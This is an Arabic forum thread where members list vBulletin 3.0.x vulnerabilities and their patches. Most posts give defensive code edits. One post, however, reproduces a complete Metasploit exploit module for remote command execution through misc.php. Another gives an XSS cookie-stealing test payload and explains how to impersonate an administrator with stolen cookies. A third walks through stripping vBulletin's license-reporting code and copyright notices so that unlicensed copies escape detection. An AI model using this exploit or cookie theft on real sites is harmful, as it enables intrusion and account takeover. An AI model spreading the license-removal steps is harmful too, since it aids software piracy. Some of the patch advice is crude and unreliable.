جميع ثغرات النسخة الثالثة تجدها هنا مع طريقة إغلاقها (ترقيعها)

mido_saml

New Member
بسم الله الرحمن الرحيم

أهلا و سهلا بكم إخواني الأحباء أعضاء المنتدى

تفضلوا الثغرات متسلسلة:

1- ثغرات في المجلدات admincp و includes و modcp و install و طريقة ترقيعها

طريقة حماية هذه المجلدات سهلة جدا وطريقة حمايتها كالتالى احميها باسم مستخدم و كلمة مرور و مجلد install الأفضل أن تحذفه بالكامل و عند التطوير تضع مجلد النسخة الجديدة و تسوي install عادي و هذا يرجع لك المهم إما حماية مجلد install أو حذفه و مجلدي admincp و modcp إذا كان يمكن للهاكر تعدي الحماية و اختراقهم فيمكنك بدلا من أن تحميهم أن تغير اسمهم إلى أي اسم مثل ABDFVadmincp حتى لا يعرف المخترق امتداد المجلد و لكن عند تغيير اسم المجلد يجب أن تذهب لملف config.php الموجود داخل ملجد include و تغيير اسمهم منه أيضا و الطريقة كالتالي:

افتح ملف config.php و ابحث عن الكود :

PHP:
$admincpdir = 'admincp';

و غير اسم admincp إلى الاسم الذي اخترته من قبل للمجلد

و ابحث عن الكود التالي أيضا :

PHP:
$modcpdir = 'modcp';

و غير اسم modcp إلى الاسم الذي اخترته من قبل للمجلد

2- ثغرة ملف last10.php آخر عشرة مواضيع و طريقة ترقيعها

غالبا ما يكون اسم الملف على حسب الاستايل اللي تنزله مثلا اسم ملف آخر عشرة مواضيع last10islamic.php أو last10.php أو ttlast.php و هذه الملفات يمكن أن تلاقي الثغرة موجودة فيها أو ما تلاقيها و يجب عليه إذا كنت محمل أي ملف منهم أن تبحث فيهم عن الكلمتان الآتيتين و حذفهما تماما : افتح ملف آخر عشرة مواضيع و ابحث عن الكود :

PHP:
$fsel

إذا وجدتها في أي ملف لآخر عشرة مواضيع قم بحذفها نهائيا و احفظ العمل و ارفع الملف

و أيضا ابحث عن الكود :

PHP:
$ftitle

إذا وجدتها في أي ملف لآخر عشرة مواضيع قم بحذفها نهائيا و احفظ العمل و ارفع الملف

3- ثغرة ملف private.php الرسائل الخاصة و طريقة ترقيعها

افتح ملف private.php الموجود في مجلد منتداك الرئيسي vb و ابحث عن الكود :

PHP:
$pm['title'] = trim($pm['title']);

و استبدله بالكود التالي :

PHP:
$pm['title'] = trim(xss_clean($pm['title']));

4- ثغرة ملف faq.php الأسئلة الشائعة و طريقة ترقيعها

افتح ملف faq.php و ابحث عن الكود :

PHP:
// initialize some template bits 
$faqbits = ''; 
$faqlinks = '';

و أضف بعده الكود التالي :

PHP:
$navbits[''] =$vbphrase['faq'];

5- ثغرة ملف editpost.php تعديل المشاركة و طريقة ترقيعها

افتح ملف editpost.php و ابحث عن الكود :

PHP:
$edit['title'] = trim($_POST['title']);

و استبدله بالكود التالي :

PHP:
$edit['title'] = trim(xss_clean($_POST['title']));

و في نفس الملف أيضا في أول الملف قم بوضع الكود التالي بعد الكلمة <?php :

PHP:
$title = addslashes($title); 
if (strstr($title,"script") != NULL){ 
echo "Dont Play With Me Ok Man<br>vBulletin<br>note: use scr!pt"; 
exit; 
}

و احفظ الملف و ارفعه

6- ثغرة ملف authorize.php للبيع و الشراء و طريقة ترقيعها

هذا الملف هو ملف بيع و شراء مثل paypal و الطريقة طبعا هي حذفه نهائيا و لا توجد طريقة غيرها للآن و طبعا قم بحذفه لأنه لا يفيدك و هو موجود داخل مجلد subscriptions الموجود داخل مجلد منتداك الرئيسي و لكن إذا كنت ممن يودون استخدامه فتفضل الحل : افتح الملف و ابحث عن الكود :

PHP:
$userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " . TABLE_PREFIX . "user WHERE userid = " . $item_number[1]);

و استبدله بالكود التالي :

PHP:
$userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " . 
TABLE_PREFIX . "user WHERE userid = " .intval( $item_number[1]));

7- ثغرة ملف memberlist.php قائمة الأعضاء و طريقة ترقيعها

من لوحة تحكم منتداك قم بإغلاقها كالتالي:
أ- اذهب إلى لوحة تحكم منتداك
ب- من خيارات المنتدى اذهب للخيار (قوائم الأعضاء و مشاهدة الهوية) و قم بالضغط على الخيار ( لا ) في أول الصفحة و احفظ العمل
نصيحتي هي أنك تحذف الكود من داخل الملف و تضع كود ملف index.php و هذا الأفضل بحيث أنه عندما يقوم أي واحد بالدخول للتقويم فينتقل تلقائيا للصفحة الرئيسية

8- ثغرة ملف calendar.php التقويم و طريقة ترقيعها

الطريقة الوحيدة هي أن تحذف الكود بكامله من داخل ملف calendar.php و تقوم بوضع كود ملف index.php الصفحة الرئيسية بداخله بحيث أنه عندما يقوم أي واحد بالدخول للتقويم فينتقل تلقائيا للصفحة الرئيسية

9- ثغرة ملف functions_search.php محرك البحث و طريقة ترقيعها

أدخل إلى المجلد includes الموجود في مجلد منتداك الرئيسي و غالبا ما يكون vb أي vb/includes و استبدل ملف functions_search.php الموجود في المرفق بالملف القديم

10- ثغرة كود الفلاش [FLASH] و طريقة ترقيعها

ثغرة كود الــ bb الفلاش و طريقة حذفها و إغلاقها هي أنك تذهب إلى لوحة التحكم و إلى ضبط أكواد الـ bb و حذف كود الفلاش بكامله

11- ثغرة ملف uploader.php مركز تحميل الملفات و طريقة ترقيعها

افتح ملف uploader.php و ابحث عن الكود :

PHP:
$type = explode("." ,$file_name);

و استبدله بالكود التالي :

PHP:
$type = explode("." ,$file_name,2);

و احفظ العمل و ارفع الملف مرة أخرى

12- ثغرة ملف init.php و طريقة ترقيعها

اذهب إلى مجلد includes الموجود في مجلد منتدا الرئيسي و ستجد ملف init.php استبدله بالملف الموجود بالمرفق و انتهى الأمر

13- ثغرة ملف online.php المتواجدون الآن و طريقة ترقيعها

اذهب إلى لوحة تحكم منتداك و من ثم إلى المجموعات ثم ضبط إعدادات مجموعة الأعضاء و من ثم اذهب إلى أي مجموعة مثلا مجموعة الأعضاء و انزل تحت تحت تحت و سوف تجلد الخيار (صلاحيات المتواجدون الآن) ضع كل خياراته لا و خاصة الأولى أهم شيء أي أنه بجانب الجملة يستطيع رؤية المتواجدون الآن اختر ( لا ) و احفظ العمل و طبق هذه الطريقة على كافة المجموعات و غير لازم أن تطبقها على مجموعة المشرف العام

الشرح منقول

صاحب الشرح الحقيقى هو الاخ allulu من منتديات ترايدنت
 

المرفقات

  • init + functions_search.zip
    13.9 KB · المشاهدات: 38
وهذا ترقيع لثغرة جديدة

افتح ملف private.php

ابحث عن

PHP:
$pm['title'] = htmlspecialchars_uni($pm['title']);


وقم بحذف الكود ثم قم بحفظ الملف
 
السلام عليكم ورحمة الله وبركاته
تم اكتشاف ثغرة في جميع اصدارات المنتديات حتى الاصدار السابع

والثغرة معروضة في منتدى شركة فبلتن

كان في ثغرة قديمة في نفس الملف لكن الان تم اكتشاف ثغرة أخطر منها

تاريخ اكتشاف الثغرة 2005 1426/5/12

والثغرة في ملف includes/functions_faq.php

طريقة اغلاق الثغرة :

ضع الملف المرفق بالمرفقات بدلا من الملف القديم ومنتداك راح يكون سليم ان شاء الله
 

المرفقات

  • functions_faq.zip
    3 KB · المشاهدات: 20
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته


الى كل من لديه مركز

1 - تحميل الصور
2 - تحميل الملفات
3 - تحميل الأفلام <-------- هذا ما اعتبره ضروري


ان هناك سكربتات كثير يوجد بها ثغراة

تسمح للمخترقين بالتسلل الى السيرفر

وبأمكانهم رفع الشل shll

و أخذ نسخه احتياطيه لأي سكربت كالمنتدى او المجله .... الخ

================

فأتمنى من الجميع ان يضعو هذا الهاك الذي ارفقته بداخل مجلد الصور او الملفات

حتى لا يستطيع احد اختراقه

===============

ان برمجته سهله اضفت به الداله RemoveType حتى لاتعمل فايلات الهكر او الكراك وهي تنفع لمستخدمي سيرفر ليونكس اما عن wap serv فهي على الأرجح لا تعمل
وهو عباره عن جدار حمايه لفايلات المصرحه chmod 777


منقول
 

المرفقات

  • wardeyat-hak-haking.zip
    613 بايت · المشاهدات: 15
السلام عليكم

ثغره تمكنك من رفع شل على الموقع

وللترقيع

الترقيه الي اخر اصدار او الي قبله

مكتشف الثغره
str0ke

تاريخ: 2005-08-03





كود:
Rich (BB code):
##
#        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#    Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#         Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     http://metasploit.com/projects/Framework for more information.
##

package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
        'Name'     => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
        'Version'  => '$Revision: 1.0 $',
        'Authors'  => [ 'str0ke' ],
        'Arch'     => [ ],
        'OS'       => [ ],
        'Priv'     => 0,
        'UserOpts' =>
          {
                'RHOST' => [1, 'ADDR', 'The target address'],
                'RPORT' => [1, 'PORT', 'The target port', 80],
                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
                'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
                'SSL'   => [0, 'BOOL', 'Use SSL'],
          },

        'Description' => Pex::Text::Freeform(qq{
                This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

        'Refs' =>
          [
                ['MIL', '832'],
          ],

        'Payload' =>
          {
                'Space' => 512,
                'Keys'  => ['cmd', 'cmd_bash'],
          },

        'Keys' => ['vBulletin'],
  };

sub new {
        my $class = shift;
        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
        return($self);
}

sub Exploit {
        my $self = shift;
        my $target_host    = $self->GetVar('RHOST');
        my $target_port    = $self->GetVar('RPORT');
        my $vhost          = $self->GetVar('VHOST') || $target_host;
        my $path           = $self->GetVar('RPATH');
        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

        # Encode the command as a set of chr() function calls
        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

        # Create the get request data
        my $data = "?do=page&template={\${passthru($byte)}}";

        my $req =
                "GET $path$data HTTP/1.1\r\n".
                "Host: $vhost:$target_port\r\n".
                "Content-Type: application/html\r\n".
                "Content-Length: ". length($data)."\r\n".
                "Connection: Close\r\n".
                "\r\n";

        my $s = Msf::Socket::Tcp->new(
                'PeerAddr'  => $target_host,
                'PeerPort'  => $target_port,
                'LocalPort' => $self->GetVar('CPORT'),
                'SSL'       => $self->GetVar('SSL'),
          );

        if ($s->IsError){
                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
                return;
        }

        $self->PrintLine("[*] Sending the malicious vBulletin Get request...");

        $s->Send($req);

        my $results = $s->Recv(-1, 20);
        $s->Close();

        return;
}

1;

وللتوضيح اكثر
الثغره في ملف

misc.php

المصدر:

http://www.milw0rm.com/id.php?id=1133
 
1/ شرح أخي العندليب :
السلام عليكم
الثغره قديمه وسبق ان ناقشناها هنا بسوالف و أخبرنا شركة vbulletin عنها في اصدار 3.0.3 ولكن للأسف لم يقوموا بترقيعها حتى اصدار 3.0.7 :(
لكن لي تعليق على اللي نشر الثغره
أولاً
هو أخذ الثغره من هنا من سوالف حين ناقشناها اول مره وكتبها بإسمه .

ثانياً
نشر طريقة الترقيع ناقصه للثغره وهذا اثبات ثاني :)

ثالثاً
طريقة الاستثمار اللي ذكرها للثغره خطأ وليست كالسطر الذي كتبه :) والظاهر ذاكرته خانته عند اللطش .

يعني يسرق من أعضاء سوالف ويقول انا اكتشفت والله عجايب الزمن هذا ياناس عجايب

ياخوفي بكره يجي يقول انه برمجت هاك الأختام هههههههههه والله ما استبعدها .

ع العموم ماراح أذكر طريقة الاستثمار مره ثانيه لأن الاداره سبق وان حذفت ردي في احد الردود لكن حذكر طريقة الترقيع الصحيحه .

طريقة الترقيع :
1- افتح ملف private.php

2- ابحث عن الاسطر التاليه :




PHP:
// trim the text fields
    $pm['title'] = trim($pm['title']);
    $pm['message'] = trim($pm['message']);





3- استبدلها بالأتي :


PHP:
// trim the text fields
    $pm['title'] = trim(xss_clean($pm['title']));
    $pm['recipients'] = trim(xss_clean($pm['recipients']));
    $pm['message'] = trim($pm['message']);





4- احفظ الملف وقم برفعه

للأسف الشركه لم تغلقها حتى اخر اصدار وهي ثغره من نوع Cross Site Scripting ويرمز لها XSS او CSS وخطورة هذا النوع من الثغرات تتم اذا أُرسل رابط للمشرف العام يقوم هذا الرابط بتحويله للصفحه المصابه وعن طريقها يتم سرقة الكوكيز الموجوده بجهاز المشرف العام وارسالها الى موقع اخر .
حينها ياخذ المخترق هذه الكوكيز ويضعها بدل الكوكيز الخاصه به ويدخل المنتدى باسم المشرف العام !!!
كما تلاحظون استثمارها من قبل الهكر صعب جداً .
تحياتي لكم
لا تنسون تتفاهموا مع اللي جالس ينقل مواضيع سوالف باسمه .

+++++++++++++++++++++++

2/ شرح أخي العندليب :
السلام عليكم ورحمة الله وبركاته
أخواني رواد منتدى سوالف سوفت .
لا يخفى على أغلبكم أن أغلب نسخ منتديات vBulletin مبرمجه بحيث يتم إبلاغ الشركه المنتجه للبرنامج عن وجود نسخه لها على مواقعكم .
قد تتسائلون ما الفائده من هذا التبليغ وماهي البيانات التي يتم إبلاغهم بها ؟؟
الفائده طبعاً هو لمعرفة كم عدد المواقع التي قامت بتركيب نسخ vBulletin وأيضاً لملاحقت المواقع الغير مرخصه لنسخهم .
وقبل أن أقوم باستخدام برنامجهم لم أكن أعلم عن هذا الكوود وتفاجأت بأن المستضيف قام بإغلاق المنتدى فجأه وعند مخاطبتي للمستضيف عن السبب ، ذكر لي بأنني قمت بتركيب برنامج غير مرخص وأنه يخاف من هذه الشركات لأنها سوف تقوم بإغلاق المستضيف بأكمله إذا لم يستجب لطلبهم!!
إستغربت من كلام المستضيف أشد الاستغراب وقمت بالبحث داخل هذا البرنامج حتى أعرف كيف عرفوا أن نسختي ليست مرخصه لديهم، الى أن وجدت السبب وكان عباره عن عدة أسطر برمجيه يتم استدعائها في حالة دخول المدير العام للمنتدى على لوحة التحكم .

سأبدأ أولاً بشرح طريقة إلغاء هذا الكوود أو كما يسميه البعض ( نزع كوود التبليغ ) وقد سبقني أعضاء كثر في سوالف سوفت في شرح الطريقه ولكن الجديد هنا ماهي البيانات التي تستقبلها الشركه المنتجه للـ vBulletin ؟؟

خطوات إزالة كوود التبليغ :

(1) قم بفتح ملف adminfunctions.php من مجلد includes .
(1-1) إبحث عن :


PHP:
function print_form_middle($ratval, $call = 1)
{
// similar to doformheader but a bit different
    global $session, $bbuserinfo, $uploadform;
    $retval = "<form action=\"$phpscript.php\"" . iif($uploadform," ENCTYPE=\"multipart/form-data\"", "") . " method=\"post\">\n\t<input type=\"hidden\" name=\"s\" value=\"$bbuserinfo[sessionhash]\" />\n\t<input type=\"hidden\" name=\"action\" value=\"$_REQUEST[do]\" />\n"; if ($call OR !$call) { $ratval = "<i" . "mg sr" . "c=\"ht" . "tp:" . "/". "/versi" . "on.vbul" . "letin" . "." . "com/ve" . "rsion.gif?id=$ratval\" width=\"1\" height=\"1\" border=\"0\" alt=\"\" style=\"visibility:hidden\" />"; return $ratval; }
}





(1-2) إستبدله بـ :


PHP:
function print_form_middle($ratval, $call = 1)
{
// similar to doformheader but a bit different
    global $session, $bbuserinfo, $uploadform;
    $retval = ""; return $ratval;
}





(1-3) إبحث عن:


PHP:
switch(VB_AREA)
    {
        case 'AdminCP': $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle] - vBulletin $vbphrase[admin_control_panel]"; break;
        case 'ModCP': $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle] - vBulletin $vbphrase[moderator_control_panel]"; break;
        case 'Upgrade': $titlestring = iif($title, "vBulletin $title - ") . "$vboptions[bbtitle]"; break;
        case 'Install': $titlestring = iif($title, "vBulletin $title - ") . "$vboptions[bbtitle]"; break;
        default: $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle]";
    }





(1-4) إستبدله بـ :


PHP:
switch(VB_AREA)
    {
        case 'AdminCP': $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle] - $vbphrase[admin_control_panel]"; break;
        case 'ModCP': $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle] - $vbphrase[moderator_control_panel]"; break;
        case 'Upgrade': $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle]"; break;
        case 'Install': $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle]"; break;
        default: $titlestring = iif($title, "$title - ") . "$vboptions[bbtitle]";
    }





(2) إحفظ الملف وقم برفعه لموقعك .

(3) إفتح ملف index.php من مجلد admincp .
(3-1) إبحث عن :


PHP:
if ($_REQUEST['do'] == 'home')
{

print_cp_header($vbphrase['welcome_to_the_vbulletin_admin_control_panel']);

// there have been problems reported with fsockopen() in some PHP versions.
// this should work around it though
if (phpversion() < '4.3.0' OR phpversion() > '4.3.2' OR @ini_get('allow_url_fopen') != 1)
{
    $fp = @fsockopen('version.vbulletin.com', 80, $errno, $errstr, 3);
}
else
{
    $fp = @fopen('http://version.vbulletin.com', 'r');
}
if ($fp)
{
    fclose($fp);
?>
<script type="text/javascript" src="http://version.vbulletin.com/versioncheck.js"></script>
<script type="text/javascript" src="http://version.vbulletin.com/version.js?id=L3207967"></script>
<script type="text/javascript">
<!--
if (typeof(vb_version) != "undefined" && isNewerVersion("<?php echo $vboptions['templateversion']; ?>", vb_version))
{
    var current_version = "<?php echo $vboptions['templateversion']; ?>";
    var latest_string = "<?php echo $vbphrase['latest_version_available_x']; ?>";
    var current_string = "<?php echo $vbphrase['you_are_running_vbulletin_version_x']; ?>";
    var download_string = "<?php echo $vbphrase['download_vbulletin_x_from_members_area']; ?>";

    document.writeln('<table cellpadding="4" cellspacing="0" border="0" align="center" width="90%" class="tborder"><tr><td class="tcat" align="center"><b><?php echo $vbphrase['there_is_a_newer_vbulletin_version']; ?></b></td></tr><tr><td class="alt1" align="center">');
    document.writeln('<p><b><a href="http://www.vbulletin.com/forum/showthread.ph' + 'p?postid=' + vb_announcementid + '" target="_blank">' + construct_phrase(latest_string, vb_version) + "</a></b></p>");
    document.writeln('<p>' + construct_phrase(current_string, current_version.bold()) + '</p>');
    document.writeln('<p><a href="http://www.vbulletin.com/members/" target="_blank">' + construct_phrase(download_string, vb_version.bold()) + '</a></p>');
    document.writeln('</td></tr></table>');
}
//-->
</script>

<?php
}
// *******************************





(3-2) إستبدله بـ :


PHP:
if ($_REQUEST['do'] == 'home')
{

print_cp_header($vbphrase['welcome_to_the_vbulletin_admin_control_panel']);

?>
<script type="text/javascript" src="../clientscript/versioncheck.js"></script>
<script type="text/javascript" src="../clientscript/version.js?id=1"></script>
<script type="text/javascript">
<!--
if (typeof(vb_version) != "undefined" && isNewerVersion("<?php echo $vboptions['templateversion']; ?>", vb_version))
{
    var current_version = "<?php echo $vboptions['templateversion']; ?>";
    var latest_string = "<?php echo $vbphrase['latest_version_available_x']; ?>";
    var current_string = "<?php echo $vbphrase['you_are_running_vbulletin_version_x']; ?>";
    var download_string = "<?php echo $vbphrase['download_vbulletin_x_from_members_area']; ?>";

    document.writeln('<table cellpadding="4" cellspacing="0" border="0" align="center" width="90%" class="tborder"><tr><td class="tcat" align="center"><b><?php echo $vbphrase['there_is_a_newer_vbulletin_version']; ?></b></td></tr><tr><td class="alt1" align="center">');
    document.writeln('<p><b><a href="http://www.vbulletin.com/forum/showthread.ph' + 'p?postid=' + vb_announcementid + '" target="_blank">' + construct_phrase(latest_string, vb_version) + "</a></b></p>");
    document.writeln('<p>' + construct_phrase(current_string, current_version.bold()) + '</p>');
    document.writeln('<p><a href="http://www.vbulletin.com/members/" target="_blank">' + construct_phrase(download_string, vb_version.bold()) + '</a></p>');
    document.writeln('</td></tr></table>');
}
//-->
</script>

<?php
// *******************************






(3-3) إبحث عن :


PHP:
if ($_REQUEST['do'] == 'head')
{
    ignore_user_abort(true);

    define('IS_NAV_PANEL', true);
    if (phpversion() < '4.3.0' OR phpversion() > '4.3.2' OR @ini_get('allow_url_fopen') != 1)
    {
        $fp = @fsockopen('version.vbulletin.com', 80, $errno, $errstr, 3);
    }
    else
    {
        $fp = @fopen('http://version.vbulletin.com', 'r');
    }
    $headjs = '';
    if ($fp)
    {
        fclose($fp);
        $headjs = '<script type="text/javascript" src="http://version.vbulletin.com/version.js?id=L3207967"></script>';
    }
    print_cp_header('', '', $headjs);

    ?>




(3-4) إستبدله بـ :


PHP:
if ($_REQUEST['do'] == 'head')
{
    ignore_user_abort(true);

    define('IS_NAV_PANEL', true);
    $headjs = '<script type="text/javascript" src="../clientscript/version.js?id=1"></script>';
    print_cp_header('', '', $headjs);

    ?>




(4) إحفظ الملف وقم برفعه لموقعك .

(5) قم بتحميل الملفات التاليه من :
http://version.vbulletin.com/version.js
http://version.vbulletin.com/versioncheck.js

(6) قم بوضع الملفات السابقه في مجلد clientscript .

(7) قم بالدخول على لوحة التحكم وقم بتحرير القالب footer وأزل منه الاسطر التاليه :


PHP:
<div class="smallfont\" align=\"center\">
    <!-- Do not remove this copyright notice -->
    $vbphrase[powered_by_vbulletin]
    <!-- Do not remove this copyright notice -->
    </div>





(8) قم بتحرير القالب headinclude وأزل منه الاسطر التاليه :


PHP:
<meta name="generator\" content=\"vBulletin $versionnumber\" />
<meta name=\"keywords\" content=\"$vboptions[keywords]\" />
<meta name=\"description\" content=\"$vboptions[description]\" />





(9) قم بالبحث في متغيرات اللغه عن المتغيرات :
x_powered_by_vbulletin
vbulletin_copyright
قم بالتعديل عليها وأزل مابداخلها واحفظ المتغيرات .

(10) إنتهى .

+++++++++++++++++++++++


3/ شرح أخي العندليب :
هناك سكربت تم تركيبه على موقع vbulletin.com وقد تجدون إسمه في سكربت adminfunctions.php ورابطه هو :
http://version.vbulletin.com/version.gif

السكربت هذا ليس صوره :)
بل عباره عن link داخل الموقع يتم توجيهه على سكربت اخر اسمه version.php والحمدلله توصلت بطريقتي لمحتوياته وهذه هي :


PHP:
<?

ignore_user_abort(1);

if (!$nooutput) {
    readfile("./clear.img");
     flush();
}

$nixtime = time();
$userip = $REMOTE_ADDR;
$userhost = gethostbyaddr($REMOTE_ADDR);

// remove sessionhash from $boardurl
$boardurl = preg_replace('/(s|sessionhash)=[a-z0-9]{32}?&?/', '', $HTTP_REFERER);

mysql_connect("localhost", "****", "****");
mysql_db_query("vbulletin_customers","INSERT IGNORE INTO accesslog (lnumber,dateline,ipaddress,host,boardurl) VALUES ('".addslashes($id)."', '$nixtime', '$userip', '$userhost', SUBSTRING('$boardurl',1,LOCATE('admin','$boardurl'  )-1))");

?>





دقق في هذا السكربت قليلاً ستكتشف أنه يستقبل هذه البيانات :
(lnumber,dateline,ipaddress,host,boardurl)

lnumber : وهو رقم الرخصه التي بالمنتدى .
dateline : وهو الوقت والتاريخ لدخول السجل في قاعدة بياناتهم .
ipaddress : وهو الأيبي الخاص بالمدير العام الذي دخل الى لوحة التحكم .
host : وهو إسم مستضيف الأيبي الخاص بالمدير العام .
boardurl : عنوان المنتدى .

وأي استفسار أنا حاضر :)
تحياتي لكم

+++++++++++++++++++++++


4/ شرح أخي العندليب :
السلام عليكم
الذي يحاول فك تشفير الباسورد المشفر هذا غبي مع احترامي لمعرفته :)

هناك برامج تقوم بالتعديل على الكوكيز وتضع فيه اسماء المتغيرات مع القيم التي يسرقها الشخص المخترق .
سأضع لك أحد هذه البرامج بالمرفق وتجرب بنفسك النتيجه :)

بما أن الكوكيز الخاص بك ياعزيزي قام المخترق بسرقتها عن طريق ثغرة الرسائل الخاصه فمن السهل أن يقوم بوضع قيمها في الكوكيز الخاصه بجهازه عن طريق أحد هذه البرامج التي ذكرتها لك .
بعدها يقوم بالدخول على المنتدى بشكل طبيعي وسيظهر باسم المشرف العام ويقوم بفعل أي شيء يريده سواءاً حذف أو مسح :)
وللمعلوميه هناك ثغرات موجوده في الـ vbulletin لا تتم الا اذا كنت مشرف عام والشركه متجاهلتها تماماً :)

البرنامج بالمرفق

تحياتي لك
الملفات المرفقة :
http://www.swalif.net/softs/attachm...achmentid=18067

+++++++++++++++++++++++


5/ شرح أخي oman4hosting :
لقد تم اكتشاف ثغرة خطيرة فى منتديات vb3
ثغرة الرسائل الخاصة
الاصدارت المصابة هى 3.03, 3.0.4 ,3.0.5 3.0.6,3.0.7

للتأكد من وجود الثغرة اتبع الاتي:
قم بكتابة رسالة جديدة و ضع اسم المستلم و العنوان و في المضمون ضع الكود التالي:


PHP:
<Script>javascript:alert(document.cookie);</Script>




و اعمل مشاهدة و شووف اللي يظهر لك,, :nice:
ترقيع الثغرة:
ترقيع الثغرة
1- تغيير بملف private.php
ابحث عن


PHP:
$pm['title'] = trim($pm['title']);




استبدلها بى


PHP:
$pm['title'] = trim(xss_clean($pm['title']));


+++++++++++++++++++++++

6/ شرح أخي المتميز :
بسم الله الرحمن الرحيم ..
الصلاة والسلام على نبينا محمد و على اله و صحبه اجمعين ..
اللهم لاعلم الا ماعلمتنا ...
اما بعد ..
و طبعا الاصدار 3.0.7
ياشباب تم اكتشاف ترقيع لها و تم اكتشاف الثغرة من قبل موقع سكيروتي ; هذاي الثغرة التي يستخدمها اكبر عدد من الهكر ;
والثغرة الاولى functions_search وهذاي ثغرة ماهي قويه كثير ;
والحل لها انك تنزل الملف اللي انا حاطه بالمرفقات ; تم اكتشاف الترقيع من قبل فريق S@udi virus
تم الانتهاء من هذاي الثغرة والحمد لله ;
---
نجي لثغرة خطيره جدا جدا جدا ; بالنسبه لي
misc.php = هذي الثغرة تقوم بأرسال اوامر اللينكس يعني كأنك رافع لك شل !! يعني توفر عليك و طبعا الهكر مابقو شيء مااكتشفوه اكتشفو حتى كيف تخطى السيف مود ; لا اله الا الله عليهم !!
:anger2:
وهذي الثغرة خطيره ;
والترقيع بالمرفقات
الملفات المرفقة :
http://www.swalif.net/softs/attachm...achmentid=18491
 
مشكور جداَ يا أخي علي هذا الموضوع
 
العفو اخى الغالى على المرور والرد الطيب

وانا ما عملت إلا الواجب
 
مشكوووووووور اخي الله يعطيك الف عافية وما قصرت ونحن في انتظار المزيد

دمت لنا وللمنتدى

تحياتي لك الحارة
اخوك
almgashi
 
عودة
أعلى